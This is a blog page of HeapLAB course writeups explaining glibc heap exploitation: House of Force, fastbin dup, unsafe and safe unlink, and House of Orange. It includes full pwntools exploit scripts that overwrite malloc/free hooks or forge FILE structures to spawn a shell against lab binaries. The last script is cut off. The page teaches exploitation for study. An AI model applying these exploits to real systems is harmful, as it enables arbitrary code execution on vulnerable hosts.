
HeapLAB

Below are some of my notes and challenge writeups for Max Kamper’s excellent HeapLAB course.

This page will be updated with more challenges in the future.

House of Force

This technique comes from Phantasmal Phantasmagoria’s Malloc Maleficarum, one of the most seminal early works in pwning Glibc malloc (and the reason so many heap exploits are called “House of XYZ”).

In Glibc, malloc requests for memory are serviced from the top chunk (aka the wilderness). Because heap metadata is stored in-line (the size of a chunk occupies the first 8 bytes of every chunk, just before the address returned from malloc), if we have a heap overflow we can clobber this metadata and create a huge top chunk; so huge in fact that it wraps around the virtual address space to an address before the start of the top chunk. Then we can request a massive chunk from malloc that stops just short of our target address such that the first 8 bytes of the (new) top chunk reside at the target address. Use the same heap overflow as before and we’ve overwritten the target value!
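
To make the "wraps around the virtual address space" part concrete, here’s a toy model of the arithmetic (all addresses made up, and the exact header/alignment adjustments malloc applies to the request are glossed over):

Python
# toy model of the top chunk bookkeeping after the overflow (not glibc code)
MASK = (1 << 64) - 1                  # pointer arithmetic wraps modulo 2**64

top    = 0x603290                     # pretend address of the top chunk
target = 0x602010                     # pretend target *below* the heap (e.g. a global)

top_size = 0xffffffffffffffff         # the value we overflowed into the top chunk's size field

# distance from the top chunk to just before the target, taken modulo 2**64
request = (target - 0x20 - top) & MASK
assert request <= top_size            # the "is the top chunk big enough?" check always passes now

new_top = (top + request) & MASK      # roughly where the new top chunk ends up
print(hex(new_top))                   # 0x601ff0: just before target, so the user data of the
                                      # next small allocation lands on top of it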

Solve

The vulnerability in this binary is that read uses the size of the chunk (returned by malloc_usable_size), not the size of the user’s data, resulting in an 8 byte overflow if we request CHUNK_SIZE-8 bytes from malloc (this is the maximum size of user data that can fit in a chunk of size CHUNK_SIZE).

Python
from pwn import *

context.log_level = 'warning'

elf = context.binary = ELF("house_of_force")
libc = ELF(elf.runpath + b"/libc.so.6")

def malloc(size, data):
    proc.send(b"1")
    proc.sendafter(b"size: ", f"{size}".encode())
    proc.sendafter(b"data: ", data)
    proc.recvuntil(b"> ")

proc = remote("localhost", 1337)

proc.recvuntil(b"puts() @ ")
libc.address = int(proc.recvline(), 16) - libc.sym.puts

proc.recvuntil(b"heap @ ")
heap = int(proc.recvline(), 16)
proc.recvuntil(b"> ")

info(f"heap: 0x{heap:02x}")
proc.timeout = 0.5

malloc(0x20-8, b"A"*(0x20-8) + p64(0xffffffffffffffff))
# we're calculating the distance between the end of the previous chunk and the address exactly one chunk away (0x20 bytes) from __malloc_hook, so that the next chunk we allocate will overwrite __malloc_hook
# also we have a heap leak so put /bin/sh on the heap
malloc((libc.sym.__malloc_hook-0x20) - (heap+0x20), b"/bin/sh\x00")
malloc(0x20-8, p64(libc.sym.system))
# the size of the chunk gets passed to __malloc_hook, so we will allocate &"/bin/sh\x00" bytes
malloc(heap+0x20+0x8+0x8, b"")

proc.sendline(b"id")
print(proc.recvall(timeout=0.1))
b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'

Fastbin dup

This time the vuln is a nice and simple double free: free doesn’t check if an index was previously freed, so we can free a previously malloc​ed chunk as many times as we want.

Before we move on, let’s talk about in-band (stored on the heap) vs out-of-band (stored somewhere besides the heap) heap metadata. We saw previously that the size of a chunk is stored in the chunk itself, but how does malloc know where e.g. the top chunk is in order to service a request? That bookkeeping lives in a heap arena: a data structure that tracks the state of a heap (and there can be more than one heap). When a program has multiple threads it would be inefficient to contend for a single lock on every allocation and free, so each thread (up to a limit) gets its own slice of program memory, governed by its own arena.

C
struct malloc_state
{
  /* Serialize access.  */
  __libc_lock_define (, mutex);

  /* Flags (formerly in max_fast).  */
  int flags;

  /* Set if the fastbin chunks contain recently inserted free blocks.  */
  /* Note this is a bool but not all targets support atomics on booleans.  */
  int have_fastchunks;

  /* Fastbins */
  mfastbinptr fastbinsY[NFASTBINS];

  /* Base of the topmost chunk -- not otherwise kept in a bin */
  mchunkptr top;

  /* The remainder from the most recent split of a small request */
  mchunkptr last_remainder;

  /* Normal bins packed as described above */
  mchunkptr bins[NBINS * 2 - 2];

  /* Bitmap of bins */
  unsigned int binmap[BINMAPSIZE];

  /* Linked list */
  struct malloc_state *next;

  /* Linked list for free arenas.  Access to this field is serialized
     by free_list_lock in arena.c.  */
  struct malloc_state *next_free;

  /* Number of threads attached to this arena.  0 if the arena is on
     the free list.  Access to this field is serialized by
     free_list_lock in arena.c.  */
  INTERNAL_SIZE_T attached_threads;

  /* Memory allocated from the system in this arena.  */
  INTERNAL_SIZE_T system_mem;
  INTERNAL_SIZE_T max_system_mem;
};

The piece of metadata we care about here is the fastbins. As an optimization for small (and therefore frequent) allocations, chunks whose size falls within the first NFASTBINS multiples of the smallest chunk size are, when freed, pushed onto a corresponding singly linked list (the heads of these lists live in fastbinsY). And while the list heads are stored in the arena, the subsequent fd pointers are stored in-line in the chunks themselves, overlapping with where user data normally goes.
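
For reference, glibc maps a chunk size to its fastbin with a simple shift (fastbin_index); on 64-bit the default fastbins cover sizes 0x20 through 0x80 in 0x10 steps. A quick Python equivalent:

Python
# Python equivalent of glibc's fastbin_index() on 64-bit: bin = (size >> 4) - 2
def fastbin_index(size: int) -> int:
    return (size >> 4) - 2

# chunk sizes 0x20..0x80 (the default fastbin range) map to bins 0..6
for size in range(0x20, 0x90, 0x10):
    print(hex(size), "->", fastbin_index(size))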

I like to think of a chunk like this:

C
struct fastbin_chunk_0x20 {
  union {
    struct {
      /* the flag bits live in the low 3 bits of the size field */
      size_t prev_inuse : 1;
      size_t is_mmapped : 1;
      size_t non_main_arena : 1;
      size_t _size : 61;
    };
    size_t size;
  };
  union {
    struct {
      struct fastbin_chunk_0x20 *fd;
      char _reserved[0x20-8-8];
    } free;
    struct {
      char data[0x20-8];
    } inuse;
  };
};

Combining this knowledge with our double free, we could free chunk A twice, causing it to be added to the corresponding fastbin freelist twice; a subsequent malloc of the same size returns chunk A, and the first 8 bytes of its user data are still interpreted as the fd pointer of the copy of chunk A that remains in the freelist. If we corrupt that fd pointer, then once the remaining copy of A has been handed out, the following allocation of that size is serviced from wherever the corrupted fd points.
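
The freelist gymnastics are easier to see with a toy model of the fastbin as a LIFO singly linked list (pure Python, no glibc involved):

Python
# toy fastbin: a LIFO list of chunk addresses; the head is the last element
freelist = []

A, B = 0x1000, 0x2000            # pretend chunk addresses

freelist.append(A)               # free(A)
freelist.append(B)               # free(B) - dodges the "is A already the head?" check
freelist.append(A)               # free(A) again - A is now in the list twice

print([hex(c) for c in reversed(freelist)])   # head -> tail: A -> B -> A

first = freelist.pop()           # malloc() hands A back to us, but the other copy of A is
                                 # still queued, and its fd is the first 8 bytes of the
                                 # buffer we were just given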

As an additional complication, we can’t just allocate chunk A and then free it twice back to back, because _int_free checks whether the chunk being inserted is already at the head of its fastbin (the "double free or corruption (fasttop)" check). There’s also a check at allocation time that a chunk taken from a fastbin has a size matching that bin:

C
size_t victim_idx = fastbin_index (chunksize (victim));
if (__builtin_expect (victim_idx != idx, 0))
    malloc_printerr ("malloc(): memory corruption (fast)");

The double-free check is trivially bypassed by freeing a different chunk in between the two frees of chunk A; the size check is why the fake chunk we allocate later will need a believable size field.

Solve

There are a few complications to address when actually writing the exploit.

We have a libc leak again so malloc hooks (particularly __malloc_hook and __free_hook) are viable targets. However, because this time we’re allocating a fake chunk from a corrupted freelist pointer, the 16 bytes before our target must be valid metadata for a freed chunk.

__free_hook is surrounded by zeroes so it’s a no-go, but __malloc_hook is a different story. Instead of putzing around with finding a good alignment ourselves, we can let pwndbg’s find_fake_fast command do it for us:
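
What pwndbg is doing for us is just scanning the bytes in front of the target for something that could pass the fastbin size check quoted above; the condition itself, expressed in Python (a sketch, not pwndbg’s actual code):

Python
# could the qword found at some address serve as the size field of a fake chunk
# in the fastbin we're poisoning?
def fastbin_index(size: int) -> int:
    return (size >> 4) - 2                   # 64-bit glibc

def usable_as_fake_size(qword: int, bin_size: int) -> bool:
    size = qword & ~0x7                      # chunksize() strips the three flag bits
    return fastbin_index(size) == fastbin_index(bin_size)

# classic x86_64 example: a stray 0x7f byte a little before __malloc_hook acts as
# the size field of a fake chunk in the 0x70 fastbin (request size 0x68)
assert usable_as_fake_size(0x7f, 0x70)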

But a size field of 0xf8 is larger than the largest fastbin size (0x80). The values at _IO_wide_data_0+240 differ between my aarch64-linux NixOS VM (running the binary with QEMU/Rosetta) and the intended x86_64-linux Ubuntu VM, so this approach won’t work for my setup specifically.

The same is also true for trying FSOP, as we can’t create a fake chunk in __GI__IO_file_jumps.

We’ll soon discuss a very interesting method of using the fastbin dupe to corrupt main_arena’s top_chunk pointer, but that requires more allocations than the 7 we’re permitted here, so we’ll settle for overwriting the target for now.

Python
from pwn import *

context.log_level = 'warning'

elf = context.binary = ELF("fastbin_dup")
libc = ELF(elf.runpath + b"/libc.so.6")

def malloc(size, data):
    proc.send(b"1")
    proc.sendafter(b"size: ", f"{size}".encode())
    proc.sendafter(b"data: ", data)
    proc.recvuntil(b"> ")

def free(index):
    proc.send(b"2")
    proc.sendafter(b"index: ", f"{index}".encode())
    proc.recvuntil(b"> ")

proc = remote("localhost", 1337)

proc.recvuntil(b"puts() @ ")
libc.address = int(proc.recvline(), 16) - libc.sym.puts

proc.sendafter(b"Enter your username: ", p64(0x20))

proc.recvuntil(b"> ")
proc.timeout = 0.5

proc.send(b"3")
proc.recvline()
print(proc.recvline())

# 0x20 freelist: NULL
malloc(0x20-8, b"A")
malloc(0x20-8, b"B")
free(0)
# 0x20 freelist: [chunk A] -> NULL
free(1)
# 0x20 freelist: [chunk B] -> [chunk A] -> NULL
free(0)
# 0x20 freelist: [chunk A] -> [chunk B] -> [chunk A] -> NULL
malloc(0x20-8, p64(elf.sym.user-8)) # chunk C
# 0x20 freelist: [chunk B] -> [chunk A] -> &user
malloc(0x20-8, b"D")
# 0x20 freelist: [chunk A] -> &user
malloc(0x20-8, b"E")
# 0x20 freelist: &user
malloc(0x20-8, b"F"*8 + b"pwned")

proc.send(b"3")
proc.recvline()
print(proc.recvline())
b'target: XXXXXXX\n'
b'target: pwnedXX\n'

Challenge solve

So I hinted that there’s a way to corrupt main_arena’s top_chunk pointer to achieve a truly arbitrary write, and indeed we’ll do just that.

The basic idea is that the fastbin dup gives us an arbitrary write over a fastbin head pointer; most values don’t point to a valid freed fastbin chunk and will just crash the integrity checks the next time we allocate from that bin, but what if we used that write to plant a size value inside main_arena, manufacturing a fake free fastbin chunk there? Then we could use another fastbin dup to hand ourselves that fake chunk and clobber the top chunk pointer, which is convenient because allocations serviced from the top chunk are not subject to the same strict size integrity checks as fastbin chunks!
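
Concretely, the two dups in the solve below line up like this (a sketch of the arithmetic, assuming the malloc_state layout those offsets imply: fastbinsY[0] at main_arena+0x10 and top at main_arena+0x60):

Python
# how the fake fastbin chunk inside main_arena is laid out (made-up base address)
arena = 0x7ffff7dd0b20               # pretend &main_arena

# first dup: the 0x20 bin's head (fastbinsY[0], at arena+0x10) is set to 0x60
# second dup: the 0x60 bin's head is set to arena+0x8
fake_chunk = arena + 0x8             # fake chunk header
size_field = fake_chunk + 0x8        # == arena+0x10 == fastbinsY[0], which now holds 0x60
mem        = fake_chunk + 0x10       # pointer malloc hands back: arena+0x18

padding = (arena + 0x60) - mem       # distance from our write cursor to main_arena.top
print(hex(padding))                  # 0x48 - matches the b"\x00"*0x48 in the solve below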

By setting the top pointer to just before __malloc_hook (with some misalignment introduced to ensure the fake top chunk has a valid size field), we can jump to a one_gadget when we next call malloc:

Bash
one_gadget $(patchelf --print-rpath fastbin_dup_2)/libc.so.6
0xc4dbf execve("/bin/sh", r13, r12)
constraints:
  [r13] == NULL || r13 == NULL || r13 is a valid argv
  [r12] == NULL || r12 == NULL || r12 is a valid envp

0xc4ddf execve("/bin/sh", rbp-0x40, r12)
constraints:
  address rbp-0x38 is writable
  rdi == NULL || {"/bin/sh", rdi, NULL} is a valid argv
  [r12] == NULL || r12 == NULL || r12 is a valid envp

0xc4de6 execve("/bin/sh", rbp-0x40, r12)
constraints:
  address rbp-0x38 is writable
  rax == NULL || {rax, rdi, NULL} is a valid argv
  [r12] == NULL || r12 == NULL || r12 is a valid envp

0xe1fa1 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL || {[rsp+0x50], [rsp+0x58], [rsp+0x60], [rsp+0x68], ...} is a valid argv

As it happens we control the contents of [rsp+0x50], which we can set to a string that prevents further argument processing; "-s" does the trick for dash​/​bash.

Python
from pwn import *

context.log_level = 'warning'

elf = context.binary = ELF("fastbin_dup_2")
libc = ELF(elf.runpath + b"/libc.so.6")

def malloc(size, data):
    proc.send(b"1")
    proc.sendafter(b"size: ", f"{size}".encode())
    proc.sendafter(b"data: ", data)
    proc.recvuntil(b"> ")

def free(index):
    proc.send(b"2")
    proc.sendafter(b"index: ", f"{index}".encode())
    proc.recvuntil(b"> ")

proc = remote("localhost", 1337)

proc.recvuntil(b"puts() @ ")
libc.address = int(proc.recvline(), 16) - libc.sym.puts

proc.recvuntil(b"> ")
proc.timeout = 0.5

one_gadget = libc.address + 0xe1fa1

# 0x20 freelist: NULL
malloc(0x20-8, b"A")
malloc(0x20-8, b"B")
free(0)
# 0x20 freelist: [chunk A] -> NULL
free(1)
# 0x20 freelist: [chunk B] -> [chunk A] -> NULL
free(0)
# 0x20 freelist: [chunk A] -> [chunk B] -> [chunk A] -> NULL
malloc(0x20-8, p64(0x60)) # chunk C
# 0x20 freelist: [chunk B] -> [chunk A] -> 0x60
malloc(0x20-8, b"D")
# 0x20 freelist: [chunk A] -> 0x60
malloc(0x20-8, b"E")
# 0x20 freelist: 0x60

malloc(0x60-8, b"F")
malloc(0x60-8, b"G")
free(5)
# 0x60 freelist: [chunk F] -> NULL
free(6)
# 0x60 freelist: [chunk G] -> [chunk F] -> NULL
free(5)
# 0x60 freelist: [chunk F] -> [chunk G] -> [chunk F] -> NULL
malloc(0x60-8, p64(libc.sym.main_arena+8)) # chunk H
# 0x60 freelist: [chunk F] -> [chunk G] -> &main_arena
malloc(0x60-8, b"-s\x00") # chunk I, lives at rsp+0x50 when __malloc_hook is executed
# 0x60 freelist: [chunk G] -> &main_arena
malloc(0x60-8, b"J")
# 0x60 freelist: &main_arena
malloc(0x60-8, b"\x00"*0x48 + p64(libc.sym.__malloc_hook-0x1c-8))
# main_arena.top = &__malloc_hook-0x24 (misaligned so the fake top chunk's size field looks sane)
malloc(0x80-8, b"L"*20 + p64(one_gadget)) # chunk L
# __malloc_hook = &one_gadget
malloc(0x2d, b"") # chunk M
# __malloc_hook triggered

proc.sendline("id")
print(proc.recvline())
b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'

Unsafe unlink

When a “normal” (non-fastbin-sized) chunk is freed, it is added to the unsortedbin, a doubly linked list; this behaves very similarly to the fastbins, except there’s now an additional bk pointer stored right after the fd pointer.

But leaving a pile of randomly sized chunks sitting in a freelist is not ideal; we’d like to be able to reclaim them for larger allocations. Enter chunk consolidation: when a chunk is freed, malloc checks whether its neighboring chunks are also free, and if so it merges them backwards and/or forwards into a single larger chunk. An already-free neighbor is still sitting in a doubly linked freelist such as the unsortedbin, though, so before the merge can happen malloc has to unlink it from that list.
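
In pseudocode, backward consolidation looks roughly like this (a simplified model, not the real glibc code):

Python
# simplified model of backward consolidation in free()
def free_chunk(p, heap, unsortedbin):
    size = heap[p]["size"]
    if not heap[p]["prev_inuse"]:           # is the neighbour below us free?
        prev_size = heap[p]["prev_size"]    # in-band metadata we can forge
        prev = p - prev_size                # walk back to that neighbour's header
        unsortedbin.remove(prev)            # unlink() it from its doubly linked list
        p, size = prev, size + prev_size    # merge the two chunks into one
    heap[p]["size"] = size                  # record the merged size
    unsortedbin.append(p)                   # the (possibly merged) chunk goes back into a bin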

In older versions of Glibc this linked list unlinking was not performed safely, so by corrupting heap chunks one could leverage this chunk consolidation for a (somewhat constrained) reflected write.2

Solve

In this challenge we can write 8 bytes past the end of our requested size, which we can use to corrupt the next chunk’s size field and flags.

By clearing chunk B’s prev_inuse flag, we can convince malloc that the chunk before chunk B (chunk A) is free, so that freeing chunk B triggers backward consolidation. When we free chunk B, malloc attempts to unlink chunk A from its (supposed) freelist by setting chunk_a.bk->fd = chunk_a.fd and chunk_a.fd->bk = chunk_a.bk (via temporary variables):

C
#define unlink(AV, P, BK, FD) {\
    FD = P->fd;\
    BK = P->bk;\
    FD->bk = BK;\
    BK->fd = FD;\
    if (!in_smallbin_range (P->size)\
        && __builtin_expect (P->fd_nextsize != NULL, 0)) {\
            if (FD->fd_nextsize == NULL) {\
                if (P->fd_nextsize == P)\
                  FD->fd_nextsize = FD->bk_nextsize = FD;\
                else {\
                    FD->fd_nextsize = P->fd_nextsize;\
                    FD->bk_nextsize = P->bk_nextsize;\
                    P->fd_nextsize->bk_nextsize = FD;\
                    P->bk_nextsize->fd_nextsize = FD;\
                }\
            } else {\
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;\
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;\
            }\
    }\
}
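
Plugging the solve’s values into the first four lines of that macro shows the reflected write (a sketch with made-up addresses; fd lives at offset 0x10 of a chunk and bk at offset 0x18):

Python
# the two stores unlink() performs, given the fd/bk the solve below plants in chunk A
free_hook      = 0x7ffff7dd37a8      # pretend &__free_hook
shellcode_addr = 0x603030            # pretend heap address of our shellcode

fd = free_hook - 0x18                # chunk A's forged fd
bk = shellcode_addr                  # chunk A's forged bk

stores = {
    fd + 0x18: bk,                   # FD->bk = BK  ->  __free_hook = shellcode_addr
    bk + 0x10: fd,                   # BK->fd = FD  ->  also smashes 8 bytes inside the shellcode buffer
}
assert fd + 0x18 == free_hook        # the first store is exactly the hook overwrite we want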

With that in mind the exploit is pretty straightforward. Unfortunately I can’t use the OG method of writing shellcode on the heap because in QEMU/Rosetta the heap isn’t marked executable (even though the stack is—weird), and we can’t use a one_gadget because Glibc .text isn’t writable:

[*] './unsafe_unlink'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        PIE enabled
    Stack:      Executable
    RWX:        Has RWX segments
    RUNPATH:    b'../.glibc/glibc_2.23_unsafe-unlink'
    Stripped:   No
    Debuginfo:  Yes
Python
from pwn import *

context.log_level = 'warning'

elf = context.binary = ELF("unsafe_unlink")
libc = ELF(elf.runpath + b"/libc.so.6")

def malloc(size):
    proc.send(b"1")
    proc.sendafter(b"size: ", f"{size}".encode())
    proc.recvuntil(b"> ")

def edit(index, data):
    proc.send(b"2")
    proc.sendafter(b"index: ", f"{index}".encode())
    proc.sendafter(b"data: ", data)
    proc.recvuntil(b"> ")

def free(index):
    proc.send(b"3")
    proc.sendafter(b"index: ", f"{index}".encode())
    proc.recvuntil(b"> ")

proc = remote("localhost", 1337)

proc.recvuntil(b"puts() @ ")
libc.address = int(proc.recvline(), 16) - libc.sym.puts

proc.recvuntil(b"heap @ ")
heap = int(proc.recvline(), 16)

proc.recvuntil(b"> ")
proc.timeout = 0.5

shellcode = flat(
    asm("jmp .+18"),
    p64(0),
    p64(0),
    asm(shellcraft.amd64.linux.sh())
)
# start of the heap plus chunk A's prev_size, size, fd, and bk fields
shellcode_addr = heap + 8 + 8 + 8 + 8

malloc(0x3f0-8) # chunk A
malloc(0x3f0-8) # chunk B
edit(0, p64(libc.sym.__free_hook-0x18) + p64(shellcode_addr) + shellcode + b"A"*(0x3f0-8-8-len(shellcode)-8-8) + p64(0x3f0) + p64((0x3f0) & ~0b111))
free(1) # trigger unlink of chunk A

free(0) # trigger __free_hook

proc.sendline(b"id")
print(proc.recvall())

Safe unlink

This is effectively the same as unsafe unlink, except integrity checks have since been added to the unlinking process that thwart our previous approach:

C
/* Take a chunk off a bin list.  */
static void
unlink_chunk (mstate av, mchunkptr p)
{
  if (chunksize (p) != prev_size (next_chunk (p)))
    malloc_printerr ("corrupted size vs. prev_size");

  mchunkptr fd = p->fd;
  mchunkptr bk = p->bk;

  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
    malloc_printerr ("corrupted double-linked list");

  fd->bk = bk;
  bk->fd = fd;
  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
    {
      if (p->fd_nextsize->bk_nextsize != p
	  || p->bk_nextsize->fd_nextsize != p)
	malloc_printerr ("corrupted double-linked list (not small)");

      if (fd->fd_nextsize == NULL)
	{
	  if (p->fd_nextsize == p)
	    fd->fd_nextsize = fd->bk_nextsize = fd;
	  else
	    {
	      fd->fd_nextsize = p->fd_nextsize;
	      fd->bk_nextsize = p->bk_nextsize;
	      p->fd_nextsize->bk_nextsize = fd;
	      p->bk_nextsize->fd_nextsize = fd;
	    }
	}
      else
	{
	  p->fd_nextsize->bk_nextsize = p->bk_nextsize;
	  p->bk_nextsize->fd_nextsize = p->fd_nextsize;
	}
    }
}

Basically, the locations our fake fd and bk point at must themselves hold a pointer back to our chunk, which severely limits our options. But as it turns out, unlink_chunk can still be leveraged for an arbitrary write, in a way that’s very specific to our target binary.

Solve

In our binary there exists a global variable m_array that has pointers to the chunks we’re allocating on the heap.

We can craft a fake freed chunk A with fd and bk pointers that point to m_array[0], which in turn points back to chunk A, thus passing the integrity checks. As an additional complication we can’t free chunk A as-is, but that’s fine—we can create a smaller fake chunk within chunk A and use that.

This has the effect of clobbering m_array[0].user_data so that it points just before itself; when we try to edit chunk A, we’re actually editing m_array. From there we can overwrite m_array[0].user_data to point at __free_hook, and edit “chunk A” once more to write a one_gadget.

Or so I thought; as it turns out I couldn’t satisfy any of the one_gadget constraints, even with rdi/[rdi] or rax control (by clobbering m_array[1].user_data). But if we have an arbitrary write, we can just write "/bin/sh" at the start of our fake chunk and set __free_hook to system, nice and simple.
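
The pointer gymnastics that satisfy the fd->bk == P and bk->fd == P checks look like this (a sketch with made-up addresses; 0x10 and 0x18 are the offsets of fd and bk within a chunk):

Python
# making the safe-unlink checks pass via m_array (made-up addresses)
m_array = 0x602060                    # pretend &m_array; m_array[0] holds a pointer to chunk A's data
P       = 0x603010                    # the fake chunk we build inside chunk A's data
memory  = {m_array: P}                # i.e. m_array[0] == P

fd = m_array - 0x18                   # forged fd planted in the fake chunk
bk = m_array - 0x10                   # forged bk

# glibc's checks: fd->bk (read at fd+0x18) and bk->fd (read at bk+0x10) must both equal P
assert memory[fd + 0x18] == P
assert memory[bk + 0x10] == P

# after "fd->bk = bk; bk->fd = fd;", m_array[0] ends up holding fd == &m_array - 0x18,
# so editing index 0 now writes over m_array itself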

Python
from pwn import *

context.log_level = 'warning'

elf = context.binary = ELF("safe_unlink")
libc = ELF(elf.runpath + b"/libc.so.6")

def malloc(size):
    proc.send(b"1")
    proc.sendafter(b"size: ", f"{size}".encode())
    proc.recvuntil(b"> ")

def edit(index, data):
    proc.send(b"2")
    proc.sendafter(b"index: ", f"{index}".encode())
    proc.sendafter(b"data: ", data)
    proc.recvuntil(b"> ")

def free(index):
    proc.send(b"3")
    proc.sendafter(b"index: ", f"{index}".encode())
    proc.recvuntil(b"> ")

proc = remote("localhost", 1337)

proc.recvuntil(b"puts() @ ")
libc.address = int(proc.recvline(), 16) - libc.sym.puts

proc.recvuntil(b"> ")
proc.timeout = 0.5

malloc(0xa0-8) # chunk A
malloc(0x90-8) # chunk B
edit(0, p64(0) + p64(0x91) + p64(elf.sym.m_array-0x18) + p64(elf.sym.m_array-0x10) + b"A"*(0x90-8-8-8-8) + p64(0x90) + p64((0x90) & ~0b111))
free(1) # trigger unlink of chunk A
# m_array[0].user_data = &m_array[0].user_data-0x18
edit(0, b"\x00"*0x18 + p64(libc.sym.__free_hook - len(b"/bin/sh\x00")))
# m_array[0].user_data = &__free_hook-8
edit(0, b"/bin/sh\x00" + p64(libc.sym.system))
free(0) # trigger __free_hook with the address of "/bin/sh" as the argument

proc.sendline(b"id")
print(proc.recvline())
b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'

House of Orange

Fast forward to 2016 when the House of Orange technique was introduced at HITCON CTF Quals. This attack is a bit convoluted as it relies on internals of _IO_FILE for a specific version of Glibc, but the technique has pedagogical value for learning FSOP and the unsortedbin attack.

The pertinent bit of information is that we can write the address of the unsortedbin’s head (which lives at the start of main_arena.bins) to an arbitrary location; this is the unsortedbin attack. There doesn’t seem to be an immediately obvious use for it aside from leaking a libc address, but we can sneakily replace a different linked list head in Glibc with the head of the unsortedbin linked list.
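
Mechanically, the attack is the bck->fd store in _int_malloc’s unsorted-bin scan; with a corrupted bk it becomes a one-shot write of a main_arena address to a location of our choosing (a sketch, made-up addresses):

Python
# the single store behind the unsortedbin attack (made-up addresses)
unsorted_head = 0x7ffff7dd1b58       # &main_arena.bins[0] - 0x10, the "unsortedbin chunk"
target        = 0x7ffff7dd2500       # wherever we want a big value written (e.g. _IO_list_all)

victim_bk = target - 0x10            # what we overwrite the victim chunk's bk with

# when the victim is taken off the unsortedbin, glibc does bck->fd = unsorted_head,
# i.e. it writes unsorted_head to victim_bk + 0x10
written_to = victim_bk + 0x10
assert written_to == target          # *target now holds a pointer into main_arena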

The big non-heap candidate here is _IO_list_all, the head of the linked list of _IO_FILE structures glibc keeps for its open streams (stdin/stdout/stderr and friends). In a similar vein to the malloc hooks, _IO_FILE (or technically _IO_FILE_plus) has a vtable pointer that can be clobbered, and just like the malloc hooks we can reliably trigger execution of functions from that vtable: _IO_flush_all_lockp traverses the files in _IO_list_all and calls __overflow on any that look like they have pending output, and we can reach it by intentionally tripping a heap corruption check, whose abort path eventually calls _IO_flush_all_lockp.

C
struct _IO_FILE {
  int                  _flags;
  char *               _IO_read_ptr;
  char *               _IO_read_end;
  char *               _IO_read_base;
  char *               _IO_write_base;
  char *               _IO_write_ptr;
  char *               _IO_write_end;
  char *               _IO_buf_base;
  char *               _IO_buf_end;
  char *               _IO_save_base;
  char *               _IO_backup_base;
  char *               _IO_save_end;
  struct _IO_marker * _markers;
  struct _IO_FILE *   _chain;
  int                 _fileno;
  int                 _flags2;
  __off_t             _old_offset; // __off_t == long int
  unsigned short      _cur_column;
  signed char         _vtable_offset;
  char                _shortbuf[1];
  _IO_lock_t *        _lock;
};

struct _IO_FILE_complete {
  struct _IO_FILE _file;
  __off64_t       _offset;
  void *          __pad1;
  void *          __pad2;
  void *          __pad3;
  void *          __pad4;
  size_t          __pad5;
  int             _mode;
  char            _unused2[20];
};

struct _IO_jump_t {
  size_t           __dummy;
  size_t           __dummy2;
  /* these are all function pointers */
  _IO_finish_t     __finish;
  _IO_overflow_t   __overflow;
  _IO_underflow_t  __underflow;
  _IO_underflow_t  __uflow;
  _IO_pbackfail_t  __pbackfail;
  _IO_xsputn_t     __xsputn;
  _IO_xsgetn_t     __xsgetn;
  _IO_seekoff_t    __seekoff;
  _IO_seekpos_t    __seekpos;
  _IO_setbuf_t     __setbuf;
  _IO_sync_t       __sync;
  _IO_doallocate_t __doallocate;
  _IO_read_t       __read;
  _IO_write_t      __write;
  _IO_seek_t       __seek;
  _IO_close_t      __close;
  _IO_stat_t       __stat;
  _IO_showmanyc_t  __showmanyc;
  _IO_imbue_t      __imbue;
};

struct _IO_FILE_plus {
  struct _IO_FILE_complete  file;
  const struct _IO_jump_t * vtable;
};

Solve

There are three “phases” to our House of Orange attack (phases two and three happen at the same time but I think it’s helpful to mentally separate them):

  1. Clobber top chunk’s size field to a small page-aligned value and request a chunk larger than the top chunk can service. This causes malloc to call sbrk for a new top chunk that can service the request, and the old top chunk is added to the unsortedbin freelist (it doesn’t get extended/consolidated because the new top chunk is not contiguous with the old one).
  2. Overwrite the old top chunk’s bk pointer to point 16 bytes before _IO_list_all; when we next request a chunk, the unsortedbin attack clobbers _IO_list_all with &main_arena.bins[0]-0x10 (aka the head of the unsortedbin freelist).
  3. In addition to overwriting the old top chunk’s bk pointer, also construct a fake _IO_FILE_plus (and stash an _IO_jump_t somewhere) that coincides with the old top chunk. _IO_flush_all_lockp performs a few very basic checks against each file (essentially fp->_mode <= 0 and fp->_IO_write_ptr > fp->_IO_write_base), so be sure to pass those. Corrupting the unsortedbin this way also trips malloc’s integrity checks, and the resulting abort ends up calling (fake_filep->vtable.__overflow)(&fake_filep, -1); because fake_filep->vtable.__overflow is set to system and _flags is set to "/bin/sh" (_flags is the first member of _IO_FILE, so &fake_filep == &fake_filep._flags), this calls system("/bin/sh"). How the traversal actually lands on our fake file is sketched just below.
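
Why the traversal lands on our fake file comes down to how _IO_FILE fields happen to line up with main_arena’s bins (a sketch assuming the glibc 2.23-era layout this libc uses: bins start 0x68 bytes into main_arena, and _chain sits at offset 0x68 of an _IO_FILE):

Python
# why abort()'s file-flush walk reaches the fake file (made-up main_arena address)
main_arena = 0x7ffff7dd1b20
bins       = main_arena + 0x68           # main_arena.bins[] (after fastbinsY, top, last_remainder)

io_list_all = bins - 0x10                # value planted by the unsortedbin attack

# the flush walk treats that address as a FILE; its _chain field is at offset 0x68
chain = io_list_all + 0x68               # == bins + 0x58 == &bins[11]
assert chain == bins + 8 * 11

# bins[11] is the bk of the 0x60 smallbin (smallbin_index(0x60) == 6, bk == bins[2*6 - 1]),
# and sorting our 0x61-sized fake chunk into that bin left bins[11] pointing right at it,
# so the walk's very next "file" is the fake _IO_FILE_plus we built
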
Python
from pwn import *

context.log_level = 'warning'

elf = context.binary = ELF("house_of_orange")
libc = ELF(elf.runpath + b"/libc.so.6")

def malloc(size):
    if size == 0x18:
        proc.send(b"1")
    elif size == 0xfc0:
        proc.send(b"2")
    else:
        raise Exception("size must be 0xfc0 (large) or 0x18 (small)")
    proc.recvuntil(b"> ")

def edit(data):
    if len(data) > 0xf0:
        raise Exception("data cannot be larger than 0xf0 bytes")
    proc.send(b"3")
    proc.sendafter(b"data: ", data)
    proc.recvuntil(b"> ")

proc = remote("localhost", 1337)

proc.recvuntil(b"puts() @ ")
libc.address = int(proc.recvline(), 16) - libc.sym.puts

proc.recvuntil(b"heap @ ")
